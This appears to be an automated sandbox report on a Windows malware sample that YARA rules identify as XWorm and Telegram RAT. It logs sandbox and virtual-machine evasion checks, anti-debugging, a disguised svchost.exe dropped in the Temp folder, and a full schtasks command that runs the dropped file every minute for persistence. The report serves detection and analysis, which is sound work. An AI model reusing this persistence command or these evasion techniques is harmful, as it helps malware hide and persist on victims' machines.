                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Check if machine is in data center or colocation facility
                                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                  Source: WV7Gj9lJ7W.exe, 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                  Source: WV7Gj9lJ7W.exe, svchost.exe.0.drBinary or memory string: SBIEDLL.DLL)M9XAQTYORYTFKMYYFRL0)ESEPKMVNRVOAIMO0TS5J)5SV1GLMSOR7I5HCRJHB6)TAVJK7ZOHZPL02SA3EFM)MKAC3LTH4B04KZGDMQFR)SECJYPQFD4M8G0GH2RTP)QMBDWWNGWRBSQBCKFZZR)VHEQVCCWSSRQRH4OZ8QT)EEJCEOZ5E1DFKLJ9MYLU)R1ULFCIGSXP2MUANNY1X)7PH9KMYOJ7FQIE4A2GXA)HBZ6KRKMOSC82EMMA9XU)QYRSKEIP7H2R7DZIDLIG)A4PZEQPMXXIWLBFPYND6)ZNCUUGIYTYORWJ00SAUQINFO
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeMemory allocated: 1340000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeMemory allocated: 1AF50000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1A610000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1AE10000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 5D0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1A4A0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1AEA0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 990000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1A4A0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 11A0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1B0A0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599874Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599765Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599656Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599546Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599437Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599262Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599152Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599035Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598921Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598812Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598703Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598593Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598484Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598375Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598265Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598156Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598047Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 597937Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 597828Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 597718Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 597609Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeWindow / User API: threadDelayed 1451Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeWindow / User API: threadDelayed 8399Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -600000s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -599874s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -599765s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -599656s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -599546s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -599437s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -599262s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -599152s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -599035s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -598921s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -598812s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -598703s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -598593s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -598484s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -598375s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -598265s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -598156s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -598047s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -597937s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -597828s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -597718s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452Thread sleep time: -597609s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 5544Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 4632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 5440Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3544Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599874Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599765Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599656Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599546Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599437Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599262Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599152Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 599035Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598921Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598812Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598703Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598593Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598484Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598375Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598265Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598156Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 598047Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 597937Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 597828Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 597718Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeThread delayed: delay time: 597609Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: svchost.exe.0.drBinary or memory string: vmware
                                  Source: svchost.exe.0.drBinary or memory string: Quf7Q3Zt3QDCV4GUwvAb8GR9kDgPDvG2RqHE7VHvmcihFjJIvnIjGZFVuxgK
                                  Source: WV7Gj9lJ7W.exe, 00000000.00000002.4140218363.000000001BD56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information queried: ProcessInformationJump to behavior

                                  Anti Debugging

                                  barindex
                                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeCode function: 0_2_00007FFD9B8B7BE1 CheckRemoteDebuggerPresent,0_2_00007FFD9B8B7BE1
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeMemory allocated: page read and write | page guardJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"Jump to behavior

                                  Language, Device and Operating System Detection

                                  barindex
                                  Yara detected Telegram Recon
                                  Source: Yara matchFile source: WV7Gj9lJ7W.exe, type: SAMPLE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeQueries volume information: C:\Users\user\Desktop\WV7Gj9lJ7W.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                  Source: WV7Gj9lJ7W.exe, 00000000.00000002.4134841867.0000000001193000.00000004.00000020.00020000.00000000.sdmp, WV7Gj9lJ7W.exe, 00000000.00000002.4140218363.000000001BD56000.00000004.00000020.00020000.00000000.sdmp, WV7Gj9lJ7W.exe, 00000000.00000002.4141955412.000000001C780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Yara detected Telegram RAT
                                  Source: Yara matchFile source: WV7Gj9lJ7W.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                  Yara detected XWorm
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: WV7Gj9lJ7W.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4135621688.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED

                                  Remote Access Functionality

                                  barindex
                                  Yara detected Telegram RAT
                                  Source: Yara matchFile source: WV7Gj9lJ7W.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                  Yara detected XWorm
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: WV7Gj9lJ7W.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4135621688.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
